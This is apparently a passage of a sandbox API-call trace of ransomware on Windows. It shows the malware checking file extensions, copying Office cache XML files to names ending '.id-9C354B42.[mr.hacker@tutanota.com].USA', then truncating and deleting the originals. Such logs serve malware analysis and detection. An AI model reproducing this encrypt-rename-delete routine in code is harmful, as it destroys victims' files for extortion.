lstrlenW (lpString=".dbf") returned 4 [0034.942] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.942] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.942] lstrlenW (lpString=".1cd") returned 4 [0034.942] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.942] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.942] lstrlenW (lpString=".jpg") returned 4 [0034.942] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.943] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.943] lstrlenW (lpString="Setup.xml") returned 9 [0034.943] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0035.151] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=31094) returned 1 [0035.151] CloseHandle (hObject=0x1b0) returned 1 [0035.151] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.151] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.152] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0035.152] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0035.152] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0035.152] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0035.152] GetLastError () returned 0x0 [0035.152] ReadFile (in: hFile=0x1b0, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x7976, lpOverlapped=0x0) returned 1 [0035.157] WriteFile (in: hFile=0x1b4, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x7980, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x7980, lpOverlapped=0x0) returned 1 [0035.158] ReadFile (in: hFile=0x1b0, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0035.158] WriteFile (in: hFile=0x1b4, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.158] SetEndOfFile (hFile=0x1b4) returned 1 [0035.158] CloseHandle (hObject=0x1b4) returned 1 [0035.159] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0035.159] SetEndOfFile (hFile=0x1b0) returned 1 [0035.160] CloseHandle (hObject=0x1b0) returned 1 [0035.160] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0035.161] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.161] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.161] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.161] lstrlenW (lpString=".doc") returned 4 [0035.161] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.161] lstrlenW (lpString=".docx") returned 5 [0035.161] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.161] lstrlenW (lpString=".pdf") returned 4 [0035.161] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.161] lstrlenW (lpString=".xls") returned 4 [0035.161] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.161] lstrlenW (lpString=".xlsx") returned 5 [0035.161] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.162] lstrlenW (lpString=".ppt") returned 4 [0035.162] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.162] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.162] lstrlenW (lpString=".zip") returned 4 [0035.162] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.162] lstrlenW (lpString=".rar") returned 4 [0035.162] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.162] lstrlenW (lpString=".bz2") returned 4 [0035.162] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.162] lstrlenW (lpString=".7z") returned 3 [0035.162] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.162] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.162] lstrlenW (lpString=".dbf") returned 4 [0035.162] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.162] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.162] lstrlenW (lpString=".1cd") returned 4 [0035.162] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.162] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.162] lstrlenW (lpString=".jpg") returned 4 [0035.162] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.162] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.162] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.162] lstrlenW (lpString=".doc") returned 4 [0035.162] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.162] lstrlenW (lpString=".docx") returned 5 [0035.162] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.162] lstrlenW (lpString=".pdf") returned 4 [0035.162] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.162] lstrlenW (lpString=".xls") returned 4 [0035.162] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.162] lstrlenW (lpString=".xlsx") returned 5 [0035.163] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.163] lstrlenW (lpString=".ppt") returned 4 [0035.163] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.163] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.163] lstrlenW (lpString=".zip") returned 4 [0035.163] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.163] lstrlenW (lpString=".rar") returned 4 [0035.163] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.163] lstrlenW (lpString=".bz2") returned 4 [0035.163] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.163] lstrlenW (lpString=".7z") returned 3 [0035.163] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.163] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.163] lstrlenW (lpString=".dbf") returned 4 [0035.163] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.163] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.163] lstrlenW (lpString=".1cd") returned 4 [0035.163] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.163] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.163] lstrlenW (lpString=".jpg") returned 4 [0035.163] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.163] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0035.163] lstrlenW (lpString="Setup.xml") returned 9 [0035.163] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0035.164] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=20577) returned 1 [0035.164] CloseHandle (hObject=0x1b0) returned 1 [0035.164] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.164] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.164] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0035.164] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0035.165] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0035.165] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0035.165] GetLastError () returned 0x0 [0035.165] ReadFile (in: hFile=0x1b0, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x5061, lpOverlapped=0x0) returned 1 [0035.167] WriteFile (in: hFile=0x1b4, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x5070, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x5070, lpOverlapped=0x0) returned 1 [0035.168] ReadFile (in: hFile=0x1b0, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0035.168] WriteFile (in: hFile=0x1b4, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.168] SetEndOfFile (hFile=0x1b4) returned 1 [0035.168] CloseHandle (hObject=0x1b4) returned 1 [0035.169] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0035.169] SetEndOfFile (hFile=0x1b0) returned 1 [0035.170] CloseHandle (hObject=0x1b0) returned 1 [0035.170] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0035.171] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.171] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.171] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.171] lstrlenW (lpString=".doc") returned 4 [0035.171] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.171] lstrlenW (lpString=".docx") returned 5 [0035.171] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.171] lstrlenW (lpString=".pdf") returned 4 [0035.171] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.171] lstrlenW (lpString=".xls") returned 4 [0035.171] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.171] lstrlenW (lpString=".xlsx") returned 5 [0035.171] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.171] lstrlenW (lpString=".ppt") returned 4 [0035.171] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.171] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.171] lstrlenW (lpString=".zip") returned 4 [0035.171] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.171] lstrlenW (lpString=".rar") returned 4 [0035.171] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.171] lstrlenW (lpString=".bz2") returned 4 [0035.171] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.171] lstrlenW (lpString=".7z") returned 3 [0035.171] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.171] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.171] lstrlenW (lpString=".dbf") returned 4 [0035.171] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.172] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.172] lstrlenW (lpString=".1cd") returned 4 [0035.172] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.172] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.172] lstrlenW (lpString=".jpg") returned 4 [0035.172] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.172] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.172] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.172] lstrlenW (lpString=".doc") returned 4 [0035.172] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.172] lstrlenW (lpString=".docx") returned 5 [0035.172] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.172] lstrlenW (lpString=".pdf") returned 4 [0035.172] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.172] lstrlenW (lpString=".xls") returned 4 [0035.172] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.172] lstrlenW (lpString=".xlsx") returned 5 [0035.172] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.172] lstrlenW (lpString=".ppt") returned 4 [0035.172] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.172] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.172] lstrlenW (lpString=".zip") returned 4 [0035.172] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.172] lstrlenW (lpString=".rar") returned 4 [0035.172] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.172] lstrlenW (lpString=".bz2") returned 4 [0035.172] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.172] lstrlenW (lpString=".7z") returned 3 [0035.172] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.172] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.172] lstrlenW (lpString=".dbf") returned 4 [0035.172] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.173] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.173] lstrlenW (lpString=".1cd") returned 4 [0035.173] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.173] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.173] lstrlenW (lpString=".jpg") returned 4 [0035.173] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.173] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0035.173] lstrlenW (lpString="VisiorWW.xml") returned 12 [0035.173] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0035.174] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=8723) returned 1 [0035.174] CloseHandle (hObject=0x1b0) returned 1 [0035.174] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml")) returned 0x2020 [0035.174] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0035.174] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0035.174] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0035.174] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0035.174] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0035.175] GetLastError () returned 0x0 [0035.175] ReadFile (in: hFile=0x1b0, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x2213, lpOverlapped=0x0) returned 1 [0035.176] WriteFile (in: hFile=0x1b4, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x2220, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x2220, lpOverlapped=0x0) returned 1 [0035.178] ReadFile (in: hFile=0x1b0, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0035.178] WriteFile (in: hFile=0x1b4, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0035.178] SetEndOfFile (hFile=0x1b4) returned 1 [0035.178] CloseHandle (hObject=0x1b4) returned 1 [0035.178] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0035.178] SetEndOfFile (hFile=0x1b0) returned 1 [0035.179] CloseHandle (hObject=0x1b0) returned 1 [0035.179] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0035.180] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml")) returned 1 [0035.180] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0035.180] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0035.180] lstrlenW (lpString=".doc") returned 4 [0035.180] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.180] lstrlenW (lpString=".docx") returned 5 [0035.180] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0035.180] lstrlenW (lpString=".pdf") returned 4 [0035.180] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.180] lstrlenW (lpString=".xls") returned 4 [0035.180] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.180] lstrlenW (lpString=".xlsx") returned 5 [0035.180] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0035.180] lstrlenW (lpString=".ppt") returned 4 [0035.180] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.180] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0035.180] lstrlenW (lpString=".zip") returned 4 [0035.180] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.180] lstrlenW (lpString=".rar") returned 4 [0035.180] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.180] lstrlenW (lpString=".bz2") returned 4 [0035.180] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.180] lstrlenW (lpString=".7z") returned 3 [0035.180] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.181] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0035.181] lstrlenW (lpString=".dbf") returned 4 [0035.181] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.181] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0035.181] lstrlenW (lpString=".1cd") returned 4 [0035.181] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.181] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0035.181] lstrlenW (lpString=".jpg") returned 4 [0035.181] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.181] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0035.181] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0035.181] lstrlenW (lpString=".doc") returned 4 [0035.181] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.181] lstrlenW (lpString=".docx") returned 5 [0035.181] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0035.181] lstrlenW (lpString=".pdf") returned 4 [0035.181] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.181] lstrlenW (lpString=".xls") returned 4 [0035.181] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.181] lstrlenW (lpString=".xlsx") returned 5 [0035.181] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0035.181] lstrlenW (lpString=".ppt") returned 4 [0035.181] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.181] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0035.181] lstrlenW (lpString=".zip") returned 4 [0035.181] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.181] lstrlenW (lpString=".rar") returned 4 [0035.181] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.181] lstrlenW (lpString=".bz2") returned 4 [0035.181] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.181] lstrlenW (lpString=".7z") returned 3 [0035.181] lstrcmpiW (lpString1=".7z", lpString2="xml") returned 